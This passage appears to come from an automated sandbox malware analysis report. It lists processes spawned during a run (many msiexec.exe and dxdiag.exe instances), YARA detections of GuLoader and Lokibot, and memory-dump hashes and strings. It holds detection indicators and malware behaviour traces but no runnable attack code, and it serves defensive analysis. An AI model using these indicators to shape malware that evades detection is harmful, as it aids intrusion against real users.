                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.3059770247.000000000A8DE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:01:49:44
                              Start date:01/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:01:50:01
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:13
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:14
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                              Imagebase:0x560000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\dxdiag.exe"
                              Imagebase:0x200000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\syswow64\dxdiag.exe"
                              Imagebase:0x200000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:01:50:02
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\syswow64\dxdiag.exe"
                              Imagebase:0x200000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:false

                              Reset < >
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 810bdade38508f5a2082e827d84da362902498ff4ea777fe6d1039082a234467
                                • Instruction ID: f3f9629ce82a00344c133fce1a15cd712a14cf1724abe7b009865881345d78f4
                                • Opcode Fuzzy Hash: 810bdade38508f5a2082e827d84da362902498ff4ea777fe6d1039082a234467
                                • Instruction Fuzzy Hash: EE021131E0EBC55FE396AB2858552747BE2FF56660F0900FFC089CB193DA299C868356
                                Memory Dump Source
                                • Source File: 00000002.00000002.2229404168.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848d60000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: df1060d7930a27ca83bcefd6220f17652d3684595293b6ce687ca82a7e83abb4
                                • Instruction ID: b47af2abcfbbc6aeb95b7b10afcc70a81d7b739469057b95cf61466ba2384ebf
                                • Opcode Fuzzy Hash: df1060d7930a27ca83bcefd6220f17652d3684595293b6ce687ca82a7e83abb4
                                • Instruction Fuzzy Hash: 9AD15230A19A4E8FEBA8EF28C8557F977D1FF58340F14426AE80DC7295DF34A9448B85
                                Memory Dump Source
                                • Source File: 00000002.00000002.2229404168.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848d60000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 25da17c27f5420314bb0078233e7270964177da50f3dc31d748b9dac82230b0b
                                • Instruction ID: ef0cfff0ebf439bde58b4a2c4c51f559bd49a6baf02749e5603fb83fc8bfb8d0
                                • Opcode Fuzzy Hash: 25da17c27f5420314bb0078233e7270964177da50f3dc31d748b9dac82230b0b
                                • Instruction Fuzzy Hash: 2AD16530A19A4E8FEBA8EF28C8557F977D1FB58340F14422EE80DC7695CF7899448B85
                                Memory Dump Source
                                • Source File: 00000002.00000002.2229404168.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848d60000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca5c989d45ce3063f0f038bf7f34b0eeb247d919f4586cea2b00474c14c12646
                                • Instruction ID: f412450fa49958e3ca0cab911b143b58636aaa42af588dc4307bd3f9834b0112
                                • Opcode Fuzzy Hash: ca5c989d45ce3063f0f038bf7f34b0eeb247d919f4586cea2b00474c14c12646
                                • Instruction Fuzzy Hash: D4F15030A1DA4D8FDF88EF58C455AAD7BE1FFA8340F24416AE409D7295CB34E885CB85
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9423e93f5e753426fc54748989feb5579537ff506f300ec4d336daf4eb427a57
                                • Instruction ID: 7cfeef093e27a11bf0faf84142d6747ad88f20b8de92272879a08039be80beab
                                • Opcode Fuzzy Hash: 9423e93f5e753426fc54748989feb5579537ff506f300ec4d336daf4eb427a57
                                • Instruction Fuzzy Hash: 8DE11432E0EA855FE79AAB2858552747BE2FF56660F0801FFC04DC7183DF28AC468756
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b2f1b30d7da227b5c28a1e4fbf39aa6ea530f28611a1be8231c4f6ef1319dc5
                                • Instruction ID: 3ae22bc3cd3a6384c4c0f21a8e048353c55de21af5a0d8655ed43833e4491b38
                                • Opcode Fuzzy Hash: 5b2f1b30d7da227b5c28a1e4fbf39aa6ea530f28611a1be8231c4f6ef1319dc5
                                • Instruction Fuzzy Hash: 7FD13631D0EB8A5FE399AA6858152747BE1FF62254F0801BFD44DC71D3DE29AC058356
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 72c6d03c48b1eb3d2418c9a423f4c65603fa138913b011cbb3ae6d74b22001fd
                                • Instruction ID: 449816bcec732b761b5ce38b3500e02ee9f2568d66b724c007370858c44a4f82
                                • Opcode Fuzzy Hash: 72c6d03c48b1eb3d2418c9a423f4c65603fa138913b011cbb3ae6d74b22001fd
                                • Instruction Fuzzy Hash: E5B10331E0EB8A5FE795AB2858556B57BE1FF56690F0801FBC40DC72D3EA28AC048355
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9af15ac53bedc585b4a01827d8d086cbae466be00c3b02a9850b6842714f9b18
                                • Instruction ID: 10d00d1bbe0a44bd7642bdc41d2df69c25cbc470c03b96c9071da0aeeb974610
                                • Opcode Fuzzy Hash: 9af15ac53bedc585b4a01827d8d086cbae466be00c3b02a9850b6842714f9b18
                                • Instruction Fuzzy Hash: E5A12032E0EA894FE7A7BA2858542747BE1FF56290F0800FBC549CB5D3DB29AC45C356
                                Memory Dump Source
                                • Source File: 00000002.00000002.2229404168.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848d60000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 20067c86abfd61e302a3283d77d78500dcb02db4f86540746e7750eb23f91710
                                • Instruction ID: 063e2c3a58707cf1cc58e4bb8469404134d5b7992205693574c454f68941c42a
                                • Opcode Fuzzy Hash: 20067c86abfd61e302a3283d77d78500dcb02db4f86540746e7750eb23f91710
                                • Instruction Fuzzy Hash: 5B916130A18A4D8FEBA8EF28C4557E937E1FF58350F14422EE84EC7295CF3499448B85
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3842c8de99639384d1755b335a5c97813a2bd4847180d4d7b8eee21a3ad276c0
                                • Instruction ID: 0b4985c5bd0403cb39b90488518820c6b67e733ba833d02dcc710807168527ef
                                • Opcode Fuzzy Hash: 3842c8de99639384d1755b335a5c97813a2bd4847180d4d7b8eee21a3ad276c0
                                • Instruction Fuzzy Hash: 7761EE32E0EBC54FE796EA6858941657BE0FF16250F0800FFC489CB4A3CB286C49C356
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 868828876615c96921dbd2aed80ac92c03ef76023af9ef6c455359038b0757ba
                                • Instruction ID: 23f58bb2f2d2f1488034f70ad2fc6c97277d1c0e84bf90f6124a54b5a6bba5d5
                                • Opcode Fuzzy Hash: 868828876615c96921dbd2aed80ac92c03ef76023af9ef6c455359038b0757ba
                                • Instruction Fuzzy Hash: 12619C22A0EBC54FE753AA6858555B47FA0EF57260F0901FBC189CB4A3DB289C49C366
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c8ef653287019cd114bf1df589985ecc88fc377a79e0030da0d2a1d56c956df
                                • Instruction ID: aca068fbf74629fffaad9635a9b5c2e57fac73113111d73029e80adbdcf8de73
                                • Opcode Fuzzy Hash: 5c8ef653287019cd114bf1df589985ecc88fc377a79e0030da0d2a1d56c956df
                                • Instruction Fuzzy Hash: EF419D2190EBC54FEB53AA7848941657FE0FF16250F0900FBC589CB4E3DB285C49C356
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a773c0c978bb4de78054cfc796ba8fe76738233868212effeb08df838b70f7cb
                                • Instruction ID: 5043796c8163ad2c394f15bcc6cc8296f7aab242603c05947a994c3db70fd17a
                                • Opcode Fuzzy Hash: a773c0c978bb4de78054cfc796ba8fe76738233868212effeb08df838b70f7cb
                                • Instruction Fuzzy Hash: 4831D362D1EE879FF3A5A62828152B8A7D1FF457A0F4805FBD41DD32D2EF2C6C04425A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f8e675f330251e1ce0255af3eb698459b9389d66d97af3418521bd97b3e7755
                                • Instruction ID: 39cfc890cf74726e9b93ce0f26c028ab2d2d80f4476fc429ba32de6b50c2a1b6
                                • Opcode Fuzzy Hash: 4f8e675f330251e1ce0255af3eb698459b9389d66d97af3418521bd97b3e7755
                                • Instruction Fuzzy Hash: 2A213731E1EE4A4FE3A9BE68141427463D2FFA1294F4800BBD41CC7193EE3DAC054209
                                Memory Dump Source
                                • Source File: 00000002.00000002.2229404168.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848d60000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4848f05788981b77f7c14d35b53c80263d2bef3de5fe9f812db04d451d5a36ff
                                • Instruction ID: 579069fc48f870bd8e9920f2506882f28ede7e2c88375ab4f889a46e2f6f332e
                                • Opcode Fuzzy Hash: 4848f05788981b77f7c14d35b53c80263d2bef3de5fe9f812db04d451d5a36ff
                                • Instruction Fuzzy Hash: 5231183091E64E8EFBB4AF18CC1ABFA3394FF45365F400139E44D97092CB786989CA15
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2703be8acdf556ad037ae84158fcb420d361532ff9e2797016f6149dc11c413
                                • Instruction ID: 1085353013d72403288d93f0ac7792d6cf5a671c52382a80c3197b947b4a2a92
                                • Opcode Fuzzy Hash: e2703be8acdf556ad037ae84158fcb420d361532ff9e2797016f6149dc11c413
                                • Instruction Fuzzy Hash: 5321D062E0EAC54FE355A72818191742BE1FF55690F0A04FFE049C71D3DD289C494316
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1dfef6557e5165126d32b734a13e0ea3f43f192d6cbcb2f37931da641f06caac
                                • Instruction ID: fef7301b5338844f6c90f96e275c22d4fc2abe2713d43906fba779b842a6d472
                                • Opcode Fuzzy Hash: 1dfef6557e5165126d32b734a13e0ea3f43f192d6cbcb2f37931da641f06caac
                                • Instruction Fuzzy Hash: C921AE22E1E7856FE75AAB2858562B8BBE1FF46260F0401FBD08D87183DF286C448756
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04328e3494d6d5699a46b7e5ea0972ad817cb9e51a969919f38b632e4ad83853
                                • Instruction ID: 4b8104f5348c7750b5cc929539e845dfb80231a22efe35d390ed9c4a542a0a93
                                • Opcode Fuzzy Hash: 04328e3494d6d5699a46b7e5ea0972ad817cb9e51a969919f38b632e4ad83853
                                • Instruction Fuzzy Hash: 1811C221D0EAC56FE7A6E6385C958757BE1FF16750B0805FBC449CB1C3DA189C44C395
                                Memory Dump Source
                                • Source File: 00000002.00000002.2229404168.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848d60000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                • Instruction ID: 5de84c4825b82d2ce6c28013d16a5ee186c580ffb4cfa2b1768d8eee651180ee
                                • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                • Instruction Fuzzy Hash: BB01447115CB0C4FD748EF0CE451AB5B7E0FB95364F10056DE58AC3655D726E882CB45
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5d73ccf21b414a32abbd33cc88d29025f4af6f7b3d31a3c6b87922ddd6fc8bb
                                • Instruction ID: 7f4112e0393257bf5bbc019b880ec6ab62d7d5a3a3f68008038bb96d1ed3c961
                                • Opcode Fuzzy Hash: e5d73ccf21b414a32abbd33cc88d29025f4af6f7b3d31a3c6b87922ddd6fc8bb
                                • Instruction Fuzzy Hash: BCF0ED33A5CD0C4EE389A62C680A1F9B3D2EFC8132F5502B7C10EC3186EF26D80A4214
                                Memory Dump Source
                                • Source File: 00000002.00000002.2230046856.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff848e30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 85c58b29423b16bbd96ee46a6d22faf4b7b4b25968e3cf5305c660489cd726a1
                                • Instruction ID: e509235f564f54432156308445c9bbe62b6d3f20c1a3e5e2a36be7ec3f8f0226
                                • Opcode Fuzzy Hash: 85c58b29423b16bbd96ee46a6d22faf4b7b4b25968e3cf5305c660489cd726a1
                                • Instruction Fuzzy Hash: A1E0DF32F2DB1A4EFB99A51C28120F8B3D1EF80160B44043FC10EC2143EA2AA8168349
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4065c0b9c1164829999fca3efbc5d7d34692f105fb3f226b136cb00395932783
                                • Instruction ID: 2b91cbea037cea01e953ab2b81907a79d54a196eef1d6083243556039dea8b35
                                • Opcode Fuzzy Hash: 4065c0b9c1164829999fca3efbc5d7d34692f105fb3f226b136cb00395932783
                                • Instruction Fuzzy Hash: ABB14470E00209DFDF24DFA9D99679DBBF2AF8C314F188129D815E7294EBB49846CB41
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 69fba9f443b097f605cd41918c1fd5f3cadda4c4a9c79789a4521e883dd09176
                                • Instruction ID: f940e0f1ac320b57060b03ee356232758e4fa2ded1dccb79147a1baf532e2856
                                • Opcode Fuzzy Hash: 69fba9f443b097f605cd41918c1fd5f3cadda4c4a9c79789a4521e883dd09176
                                • Instruction Fuzzy Hash: A0B14171E00209CFDF24CFA9D99679DBBF2AF8C714F188129D415A7294EBB49846CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-1355183119
                                • Opcode ID: 5c4866868f4aa9763ee87c036c151c9425f68d0ef9e25152c001613c3d2e365c
                                • Instruction ID: a9a8e8a7cd3e4c6c55f7c38b5714b1ae98eac35e6326994d9280848ae7f39d38
                                • Opcode Fuzzy Hash: 5c4866868f4aa9763ee87c036c151c9425f68d0ef9e25152c001613c3d2e365c
                                • Instruction Fuzzy Hash: 8E3246B1B0020ACFCB249F69D8506ABBBE6EFA5315F14C4ABDD46DB251DB31D801C7A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                • API String ID: 0-108373575
                                • Opcode ID: cd1d39f4f781ccb5990dd31a0f58b1fb58845c7eb5cc2f5dcdb62f1ce8f355e2
                                • Instruction ID: 946e3c829cbdfe87cf9f8b9407694f444f5773acae7718efc1d8f58ba2dbf10f
                                • Opcode Fuzzy Hash: cd1d39f4f781ccb5990dd31a0f58b1fb58845c7eb5cc2f5dcdb62f1ce8f355e2
                                • Instruction Fuzzy Hash: 69B158B06083459FC7258F689890666BFF1EF96214F1884ABDC84CF657DB35D806C761
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                • API String ID: 0-471056614
                                • Opcode ID: 498f6e69ffb475ad8fbb89d133762881fe91efbaea5425ddf46443f593c1ba9d
                                • Instruction ID: 248cad0e697f77cf1b5d92cb4ba36490899d941a70f22e9e2ce1131e5e239ef0
                                • Opcode Fuzzy Hash: 498f6e69ffb475ad8fbb89d133762881fe91efbaea5425ddf46443f593c1ba9d
                                • Instruction Fuzzy Hash: 83D1CD74B102058FDB18DF68C550BAEBBB2EF94708F51C468D801AF395DB75E846CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                • API String ID: 0-471056614
                                • Opcode ID: 42f6a7d0af61b30b405f84ad370390a1edad21c7e71e1a4fc31fc32e8367a525
                                • Instruction ID: 431d60400a5d38a1f865a2e4b4f32b996da272be75a55794dcbebe1a42e2510c
                                • Opcode Fuzzy Hash: 42f6a7d0af61b30b405f84ad370390a1edad21c7e71e1a4fc31fc32e8367a525
                                • Instruction Fuzzy Hash: F6D18F74A00219DFD724DF58C951B9ABBB2EB84304F1084D5D909AF395CB75ED82CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$tP]q$tP]q
                                • API String ID: 0-3637193552
                                • Opcode ID: adf6c8c46c4f31b345e185ffc8403b7a1beba66fb09173dd35a4ecfb02bbcd54
                                • Instruction ID: 99d4542e2311680aafd2daadf2f00a81ffa5d90943c3c8fdf646ac87aa743a32
                                • Opcode Fuzzy Hash: adf6c8c46c4f31b345e185ffc8403b7a1beba66fb09173dd35a4ecfb02bbcd54
